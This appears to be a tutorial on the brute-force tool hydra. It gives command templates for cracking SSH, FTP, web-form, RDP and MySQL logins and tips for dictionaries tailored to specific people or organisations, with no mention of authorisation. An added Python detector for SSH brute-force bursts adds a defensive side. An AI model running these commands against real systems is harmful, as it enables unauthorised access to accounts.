
Efficient hacking of service and protocol ports with hydra

Hydra takes its name from the Hydra of Greek mythology, though you can just as well think of it as the hydra of the Chinese Shanhaijing or Journey to the West.

The name reflects its ability to brute-force numerous service and protocol ports. The tool is developed and open-sourced by the hacker group THC.

I am using Kali Linux as my operating system.

Hydra ships with the system, so I will skip the installation (clone it from GitHub if you don't have it) and get straight to the point. Open a terminal and type hydra; the first paragraph of the output looks like this:

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

To get really familiar with a tool, you must be familiar with its help output, and as its first paragraph clearly shows, the range of services and protocols it can target is far larger than you might expect.

Read further into the help output for details on the options:

-l Specify the username

-L Specify the username dictionary

-p Specify the password

-P Specify the password dictionary

-C Replaces -L/-P, e.g. admin.txt:password.txt

-q Do not show connection errors, because some IPs may not be reachable

-o Write the results to a file

-t Number of threads, default value is 16

-T Number of tasks run in parallel, default value is 64; applies when -M is used, as the task list is then large

-v Verbose mode

-V Display the username and password tried on each attempt

-e n Try an empty password, e.g. admin with an empty password

-e s Try the username as the password, e.g. admin with admin

-e ns Both of the above combined

-M Specify the target file, one entry per line, to keep it tidy

-f Stop after one successful crack; applies when -M is used

-R Resume from the last saved progress; applies when -f is used, and the two can be used together

-s Specify the service port, as some services do not run on the default port

-S Connect using the SSL protocol

-w Set the maximum timeout, the default is 30 seconds, because some IP connections wait too long

service Specify the service or protocol

server Specify the IP, which can also be a class C segment

That covers the common options, and the help output gives a few simple reference examples. However, a tool only delivers its full value once you know how to tailor it to the situation at hand.

1 - Hack ssh, default port 22, username is usually root

hydra -L username dictionary -P password dictionary -t thread -e ns ip ssh -vV -o jieguo.txt

2 - Hack ftp, default port 21; the default username on an anonymous server is anonymous

hydra -L username dictionary -P password dictionary -t thread -e ns ip ftp -vV -o jieguo.txt

3 - Hack a web login; the URL part obviously has to be constructed differently for each situation


hydra -L username dictionary -P password dictionary -t thread -e ns -s 8080 ip http-get /admin/index.php -vV -o jieguo.txt

Submitted via POST:

hydra -L username dictionary -P password dictionary -t thread -e ns -s 8080 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword" -vV -o jieguo.txt

4 - Hack rdp, default port 3389, username is usually administrator or root

hydra -L username dictionary -P password dictionary -t thread -e ns ip rdp -vV -o jieguo.txt

5 - Hack mysql, default port 3306, username is usually root

hydra -L username dictionary -P password dictionary -t thread -e ns ip mysql -vV -o jieguo.txt

The five cases above are the common ones. Other services and protocols work in much the same way and can be adapted; if you get stuck, search Baidu. Of course, if the dictionary is too large the run will take a very long time: the number of attempts against a single IP equals the size of the username dictionary multiplied by the size of the password dictionary.
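Seen from the target's side, the SSH case in example 1 is a burst of failed logins from one source, usually cycling through several usernames. The detector below is an added example, not part of the original post; the log lines are constructed, and the function name, threshold, window and year parameter are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log lines (documentation IP ranges, not from a real host).
SAMPLE_LOG = """\
Mar 10 09:15:01 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar 10 09:15:02 web1 sshd[2103]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar 10 09:15:02 web1 sshd[2105]: Failed password for invalid user admin from 203.0.113.7 port 40116 ssh2
Mar 10 09:15:03 web1 sshd[2107]: Failed password for invalid user admin from 203.0.113.7 port 40118 ssh2
Mar 10 09:15:04 web1 sshd[2109]: Failed password for invalid user test from 203.0.113.7 port 40120 ssh2
Mar 10 09:15:05 web1 sshd[2111]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar 10 09:20:11 web1 sshd[2140]: Failed password for alice from 198.51.100.23 port 51822 ssh2
Mar 10 09:20:19 web1 sshd[2142]: Accepted password for alice from 198.51.100.23 port 51824 ssh2
Mar 10 10:00:00 web1 sshd[2201]: Failed password for bob from 192.0.2.50 port 33010 ssh2
Mar 10 10:10:00 web1 sshd[2230]: Failed password for bob from 192.0.2.50 port 33090 ssh2
Mar 10 10:20:00 web1 sshd[2260]: Failed password for bob from 192.0.2.50 port 33170 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {ip: (peak failures inside one window, distinct usernames tried)}
    for every source whose failures within `window` reach `threshold`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            # Classic syslog timestamps carry no year; the caller supplies it.
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["ip"]].append((ts, m["user"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = peak = 0
        for end in range(len(evs)):
            # Advance the window start until it spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = (peak, len({user for _, user in evs}))
    return flagged

if __name__ == "__main__":
    for ip, (peak, users) in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} failures within 60s across {users} usernames")
```

A short window catches the fast burst but misses the slow source at 192.0.2.50, which only shows up with a longer window and lower threshold. Flagged sources are candidates for rate limiting or blocking, and key-only SSH authentication removes the password-guessing surface altogether.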

The effectiveness of a brute-force run depends closely on the size and quality of the dictionary. Password dictionaries are plentiful on GitHub, but when it comes to quality you need to build your own.

There are two ways to go here. First, sift through the dictionaries yourself to find the most commonly used usernames and passwords, aiming for a small, precise first pass against the server. If that fails, you can either give up or go to the next step and personalize the dictionary (for a specific individual or organization) with tools such as crunch, cupp and cewl; how to use them will be covered later. Only then can relatively efficient password brute-forcing be achieved, saving time.

Of course, the fact that hydra is used by so many people shows how usable it is. Are there other tools of its kind? Of course: medusa and ncrack, and the use of these two tools will be covered in a later post.
